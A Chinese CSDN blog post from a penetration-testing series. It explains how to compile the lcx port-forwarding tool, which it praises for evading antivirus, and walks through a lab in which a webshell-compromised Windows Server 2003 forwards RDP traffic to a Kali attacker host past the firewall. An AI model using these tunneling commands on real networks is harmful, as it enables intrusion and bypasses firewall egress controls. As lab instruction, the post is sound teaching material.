【内网流量操控技术八】lcx源码编译实现传输层流量转发

最新推荐文章于 2023-08-17 17:47:32 发布
最新推荐文章于 2023-08-17 17:47:32 发布
阅读量1.4k 收藏 4
点赞数
分类专栏: 渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/redwand/article/details/113814879
版权

文章目录

前言

lcx是基于socket技术编写的传输层协议下的端口转发工具,其出现已有十多年的历史,但其速度和稳定性至今仍然很好用,本文实验从github上下载的C++版本,一来通过源码编译在跨平台使用lcx,二来由于其源码修改进行了免杀处理,有很好的免杀效果。

一、下载编译

github下载源码地址https://github.com/windworst/LCX.git

1.linux下编译

git clone https://github.com/windworst/LCX.git
cd LCX
make

┌──(root💀kali20204)-[~/LCX]
└─# make
gcc lcx.c -o lcx -pthread -O2 
┌──(root💀kali20204)-[~/LCX]
└─# ls
lcx  lcx.c  Makefile  README.md

2.windows下编译

windows下我们使用CodeBlocks进行编译,首先新建一个project,将lcx.c源码复制到main.cpp文件中,将makefile添加一行PLATFORM=windows,放在project目录下。如果需要匿名,可以设置ANONYMOUS=1。修改后的Makefile文件如下:

ANONYMOUS=1
ifdef ANONYMOUS
	DFLAG=-DANONYMOUS
endif

CC=gcc
RM=rm
EXE=lcx
PLATFORM=windows

ifeq ($(PLATFORM), windows)
	WINDOWS_LIB=-lws2_32 -lwsock32
	RM=del
	EXE=lcx.exe
endif

FLAGS=-pthread -O2 $(WINDOWS_LIB) $(DFLAG)

all : lcx.c
	$(CC) lcx.c -o $(EXE) $(FLAGS)

command : lcx.c
	$(CC) lcx.c -o $(EXE) $(FLAGS) -DCOMMAND_MODE

clean :
	$(RM) $(EXE)

右键点击项目,Properties…–>Project settiongs–>This is a custom Makefile(勾选)。右键点击项目,Build options…–>Project build options–>“Make” commands选项中,删除所有的$target。然后build

-------------- Build: Debug in llcx (compiler: GNU GCC Compiler)---------------

Checking if target is up-to-date: mingw32-make.exe -q -f Makefile
Running command: mingw32-make.exe -f Makefile
gcc lcx.c -o lcx.exe -pthread -O2 -lws2_32 -lwsock32 
Process terminated with status 0 (0 minute(s), 2 second(s))
0 error(s), 0 warning(s) (0 minute(s), 2 second(s))

实际过程gcc运行命令行

gcc lcx.c -o lcx.exe -pthread -O2 -lws2_32 -lwsock32

二、实验环境

1.实验拓扑图

在这里插入图片描述

上图是一个最常见的DNAT网络环境,server2003作为web服务器,没有公网ip,而是通过防火墙端口映射到内网主机的80端口。因此,当我们通过webshell提权成功获得Server2003管理员权限后,如果需要通过3389登录,直接连接肯定是不行的,因为防火墙没有做内网3389的端口映射,此处最好使用lcx进行流量转发。将内网主机的3389端口流量转发到kali上来。

2.monowall配置DNAT端口映射

首先在Firewall–>Rules选项中填写DNAT规则,并勾选自动生成防火墙规则。

在这里插入图片描述
这里有一个坑,我翻了半天才明白,按理说NAT设置完成就可以了,可访问http://192.168.0.165:8888就是不通,最后发现是在Interface–>WAN选项下,有个ABC类私网地址的阻拦项,其默认是勾选上的,需要把勾选去掉。当然,如果我们内网地址使用1.1.1.10这样就不需要去掉了。
在这里插入图片描述

三、C/S命令

1.服务端(kali)

本地侦听4444端口,接收靶机转发来的3389流量,转发到本机的5555端口

./lcx -listen 4444 5555

2.客户端(server2003)

将本地访问的3389的流量,转发到kali攻击机(192.168.0.164)的4444端口

lcx.exe -slave 192.168.0.164 4444 127.0.0.1 3389

3.mstsc

在kali上,或者同局域网内mstsc访问192.168.0.164:5555端口,远程登录内网server2003成功。
在这里插入图片描述

4.本地端口映射

lcx -stran 53 目标ip 3389

总结

lcx是一个古老的内网流量转发工具,但在至今还具有相当的实战价值,我们掌握源码编译过程,不但能预防后门程序,还可以跨平台灵活使用。在有防火墙出网限制时,也可以从传输层绕过防护墙出站策略。

redwand
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
lcx工具,包括arm9和win版本
11-17
包含上找到的lcx码,该码arm-linux(v5TE)和cygwin编译版本,还有lcx.exe在windows下的原版,使用方法参考命令帮助;可远程使用telnet、ssh等。
lcx码C语言VC,LCX码 [转]
weixin_28939637的博客
05-18 354
#include #include #include #include #include #include #pragma comment(lib, "ws2_32.lib")#define VERSION "1.00"#define TIMEOUT 300#define MAXSIZE 20480#define HOSTLEN 40#define CONNECTNUM 5// define 2 ...
lcx 工具学习
最新发布
rnn0921的博客
08-17 376
意思是监听公主机本机的 4444 端口请求,并将来自 4444 端口的请求传送给 5555 端口。Lcx -slave <你的 ip> <监听端口(对应 listen 的第一个参数)> <目标 ip> <目标端口>Lcx -Listen <监听 slave 请求的端口(对应 slave 的第二个参数)> <等待连接的端口>Lcx -tran <等待连接的端口> <目标 ip> <目标端口>(1)端口转发(listen 和 slave 成对使用)5、lcx端口转发,内穿透。将安装目录加入环境变量。
LCX码 [转]
windworst的专栏
10-08 349
[code] #include #include #include #include #include #include #pragma comment(lib, "ws2_32.lib") #define VERSION "1.00" #define TIMEOUT 300 #define MAXSIZE 20480 #define HOSTLEN 40 #define CONN
C/C++学习记录:std::forward 码分析 / 完美转发的作用
这里是河边
10-11 2447
抽空扣一点感兴趣的标准库码,这里总结一下 std::forward() 相关的分析 本文中 gcc version: 8.4.1 20200928 (Red Hat 8.4.1-1) (GCC) 其中c++库安装路径为 /usr/include/c++/8 目录一、前言二、码与分析1. std::forward 码总览2. std::forward 分析三、完美转发四、总结 一、前言   本文是基于前文 C/C++学习记录:std::move 码分析 进行的。前文中分析了 std::move 的.
易语言-端口转发工具码 内穿透,类似LCX
06-25
端口转发工具码 内穿透,类似LCX 最近在用云服务器写点东西,服务器的CPU有点吃不消,于是想到了使用云服务器作为跳板,转到家里的机子,但是天朝的忘了都是局域... 于是写了这个小工具... 用法类似LCX,需要一台有...
LCX转发工具LCX转发
12-29
两个,一个免杀,一个不免,不是一个版本。自己测试。
lcx端口内转发工具
07-14
lcx端口转发
端口转发工具lcx
10-24
lcx码端口转发工具
lcx端口转发工具
04-11
lcx.exe是个端口转发工具,相当于把肉鸡A上的3389端口转发到B机上,当然这个B机必须有外IP.这样链接B机的3389度端口就相当于链接A机的3389.
Vc++端口映射
02-01
Vc++端口映射码 端口转发自己下载看吧,别的不多说了
lcx
03-22
lcx
lcx最新版本码.zip
07-06
安全的小伙伴经常用到的大家都懂的,很适合络安全开发小伙伴研究,剩下的我就不多说了
LCX 码注释 解析
05-31
lcx码带注释 解析 很好理解 需要的可以拿走 做映射很好用
lcx.exe码 vc6 ++ 工程文件
11-26
lcx.exe码 其实就是htran v1.0 lcx 将其编译后发布的lcx.exe就是由htran来的
lcx码分析
ShadowAssassin的专栏
02-10 3487
闲着没事,看到上找了份lcx码看了下。在此简单的分析下。   首先指明下 lcx 核心代码用的络模型是select选择模型。   这里仅分析了常用的功能代码   -listen port1 port2 -slave ip port1 127.0.0.1 3389   经过分析 ,画出程序大致流程如下。   (图中的buf是共用一片缓冲区,每个机器有两个共用的bu
端口转发C代码
lionzl的专栏
06-19 1571
/*端口映射PortTransfer_三种模式。(1) PortTransfer Port Dest_IP Port在运行本程序的计算机上监听Port端口,并将所有连接请求转到Dest_IP的Port去(2) PortTransfer ctrlIP ctrlPort Dest_IP Port和模式3配合用,程序将先主动连接ctrlIP:ctrlPort,之后所有在模式3
码分析C++中forward完美转发和move移动语义的本质区别
YukinoLover的博客
05-03 185
仅仅只是简简单单模糊大致的分析一下move和forward
端口转发工具lcx流量特征
05-17
由于LCX转发的是TCP流量,因此其流量特征如下: 1. TCP协议:LCX是基于TCP协议的端口转发工具,因此其流量中只会有TCP协议的数据包。 2. IP地址和端口:LCX会将本地主机的IP地址和端口作为地址和端口,发送...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值